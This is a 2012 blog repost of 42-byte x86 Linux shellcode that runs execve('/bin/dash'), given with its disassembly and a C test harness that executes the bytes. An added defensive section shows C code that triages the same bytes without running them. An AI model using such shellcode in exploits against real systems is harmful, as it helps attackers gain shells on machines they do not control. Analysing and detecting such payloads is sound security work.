Tuesday, 26 June 2012

exploit linux/x86 execve(/bin/dash) 42 bytes

Source: http://www.exploit-id.com/shellcode/linuxx86-execvebindash-42-bytes

The code:

/*
linux/x86 execve(/bin/dash) 42 bytes
Author : X-h4ck
mem001@live.com, mem003@live.com
www.pirate.al , www.flashcrew.in
Greetz : mywisdom - Danzel - Wulns~ - IllyrianWarrior- Ace - M4yh3m - Saldeath
ev1lut1on - Lekosta - Pretorian - bi0 - Slimshaddy - d3trimentaL
CR - Hack-Down - H3ll - d4nte_sA - th3p0wer and all PirateAL friends.
PROUD TO BE ALBANIAN!
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
root@bt:~/Desktop# objdump -D sh
sh: file format elf32-i386
Disassembly of section .text:
08048060 :
8048060: eb 19 jmp 0x804807b
8048062: 5b pop %ebx
8048063: b8 00 00 00 00 mov $0x0,%eax
8048068: 88 43 09 mov %al,0x9(%ebx)
804806b: 89 5b 0a mov %ebx,0xa(%ebx)
804806e: 89 43 0e mov %eax,0xe(%ebx)
8048071: b0 0b mov $0xb,%al
8048073: 8d 4b 0a lea 0xa(%ebx),%ecx
8048076: 8d 53 0e lea 0xe(%ebx),%edx
8048079: cd 80 int $0x80
804807b: e8 e2 ff ff ff call 0x8048062
8048080: 2f das
8048081: 62 69 6e bound %ebp,0x6e(%ecx)
8048084: 2f das
8048085: 64 fs
8048086: 61 popa
8048087: 73 68 jae 0x80480f1
*/
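#include <stdio.h>

/* execve("/bin/dash") payload; bytes match the objdump listing above.
   The payload patches its own data (NUL terminator and argv), so the
   array must be writable as well as executable. */
char sc[] = "\xeb\x19\x5b\xb8\x00\x00\x00\x00\x88"
            "\x43\x09\x89\x5b\x0a\x89\x43\x0e\xb0"
            "\x0b\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80"
            "\xe8\xe2\xff\xff\xff\x2f\x62\x69\x6e"
            "\x2f\x64\x61\x73\x68";

int main(void)
{
    /* Function pointer used to jump into the byte array. */
    void (*s)(void);

    /* sizeof counts the string's terminating NUL: 41 payload bytes + 1 = 42. */
    printf("madhesia : %zu\n", sizeof(sc));
    s = (void (*)(void))sc;
    s();
    return 0;
}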
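
For an analyst who meets these bytes in a capture or a memory dump, the listing above can be read without running anything. The following is an added example, not part of the original post or the author's code: it checks for the jmp short / call back / pop layout shown in the disassembly, then reports the syscall number and the data that follows the call. The names `triage_shellcode`, `triage_page_sample` and `struct triage` are hypothetical, and the syscall lookup is a simple byte scan rather than a real disassembler.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bytes copied from the page's sc[] (41 bytes; sizeof(sc) there adds the NUL). */
static const uint8_t SC[] = {
    0xeb,0x19,0x5b,0xb8,0x00,0x00,0x00,0x00,0x88,0x43,0x09,0x89,0x5b,0x0a,
    0x89,0x43,0x0e,0xb0,0x0b,0x8d,0x4b,0x0a,0x8d,0x53,0x0e,0xcd,0x80,0xe8,
    0xe2,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,0x64,0x61,0x73,0x68 };
struct triage { int nul_bytes; int syscall_nr; char data[32]; };

/* Returns 0 if b has the layout: jmp rel8 forward, call rel32 back, pop r32. */
int triage_shellcode(const uint8_t *b, size_t n, struct triage *t)
{
    memset(t, 0, sizeof *t);
    t->syscall_nr = -1;
    for (size_t i = 0; i < n; i++) t->nul_bytes += (b[i] == 0);
    if (n < 7 || b[0] != 0xeb || b[1] >= 0x80) return -1;    /* jmp rel8 */
    size_t call = 2 + (size_t)b[1];                          /* jmp target */
    if (call + 5 > n || b[call] != 0xe8) return -1;          /* call rel32 */
    int32_t rel = (int32_t)((uint32_t)b[call + 1] | (uint32_t)b[call + 2] << 8 |
                            (uint32_t)b[call + 3] << 16 | (uint32_t)b[call + 4] << 24);
    long target = (long)call + 5 + rel;                      /* must hit a pop r32 */
    if (target < 2 || (size_t)target >= call || (b[target] & 0xf8) != 0x58) return -1;
    /* Heuristic byte scan: last mov $imm8,%al (b0 xx) before int $0x80 (cd 80). */
    int al = -1;
    for (size_t i = (size_t)target; i + 1 < call; i++) {
        if (b[i] == 0xb0) al = b[i + 1];
        if (b[i] == 0xcd && b[i + 1] == 0x80) { t->syscall_nr = al; break; }
    }
    /* Bytes after the call are data; the call pushed their address for the pop. */
    size_t d = call + 5, len = n - d;
    if (len >= sizeof t->data) len = sizeof t->data - 1;
    for (size_t i = 0; i < len; i++)                         /* printable ASCII only */
        t->data[i] = (b[d + i] >= 0x20 && b[d + i] < 0x7f) ? (char)b[d + i] : '.';
    return 0;
}

const struct triage *triage_page_sample(void)
{
    static struct triage t;
    return triage_shellcode(SC, sizeof SC, &t) == 0 ? &t : NULL;
}
int main(void)
{
    const struct triage *t = triage_page_sample();
    if (t) printf("syscall=%d data=%s nul=%d\n", t->syscall_nr, t->data, t->nul_bytes);
    return t ? 0 : 1;
}
```

On the page's bytes this reports syscall 11 (execve on 32-bit x86 Linux), the string /bin/dash, and four NUL bytes, all from the `mov $0x0,%eax` immediate.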